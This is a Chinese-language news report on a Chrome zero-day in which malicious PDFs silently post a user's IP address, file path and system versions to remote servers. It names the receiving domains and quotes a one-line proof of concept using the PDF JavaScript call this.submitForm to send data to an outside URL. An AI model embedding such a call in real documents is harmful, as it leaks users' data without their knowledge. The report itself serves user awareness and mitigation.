Chrome漏洞可让黑客通过pdf文件收集用户数据

目录:

Anonim

漏洞检测服务EdgeSpot发现了一个利用PDF文档的引人入胜的Chrome零日漏洞。 利用此漏洞,攻击者可以使用在Chrome中打开的恶意PDF文档收集敏感数据。

一旦受害者在Google Chrome中打开相应的PDF文件,恶意程序就会通过收集用户数据开始在后台运行。

然后将数据转发到由黑客控制的远程服务器。 您可能想知道攻击者正在吸收哪些数据,它们将您的PC上的以下数据作为目标:

  • IP地址
  • 系统上PDF文件的完整路径
  • 操作系统和Chrome版本

提防恶意软件驱动的PDF文件

当您使用Adobe Reader打开PDF文件时没有任何反应时,您可能会感到惊讶。 此外,HTTP POST请求用于将数据传输到远程服务器,而无需任何用户干预。

专家发现,两个域readnotifycom或burpcollaboratornet之一正在接收数据。

您可以通过考虑大多数防病毒软件无法检测到EdgeSpot检测到的样本这一事实来想象攻击的强度。

专家透露,攻击者正在使用“ this.submitForm()” PDF Javascript API来收集用户的敏感信息。

我们使用最小的PoC对其进行了测试,一个简单的API调用(例如“ this.submitForm('http://google.com/test')”)将使Google Chrome将个人数据发送至google.com。

专家实际上发现,此Chrome错误已被两组截然不同的恶意PDF文件利用。 两者分别于2017年10月和2018年9月发行。

值得注意的是,攻击者将来可以使用收集到的数据来微调攻击。 报告表明,第一批文件是使用ReadNotify的PDF跟踪服务编译的。

用户可以利用该服务来跟踪用户视图。 EdgeSpot尚未共享有关第二组PDF文件性质的任何详细信息。

如何保持保护

漏洞检测服务EdgeSpot希望向Chrome用户警告潜在的风险,因为预计该补丁不会在不久的将来发布。

EdgeSpot去年向Google报告了该漏洞,该公司承诺在4月底发布补丁。 H

但是,您可以考虑使用临时性的解决方法,方法是使用替代的PDF阅读器应用程序在本地查看收到的PDF文档。

另外,您也可以通过断开系统与Internet的连接来在Chrome中打开PDF文档。 同时,您可以等待预计于4月23日推出的Chrome 74更新。

Chrome漏洞可让黑客通过pdf文件收集用户数据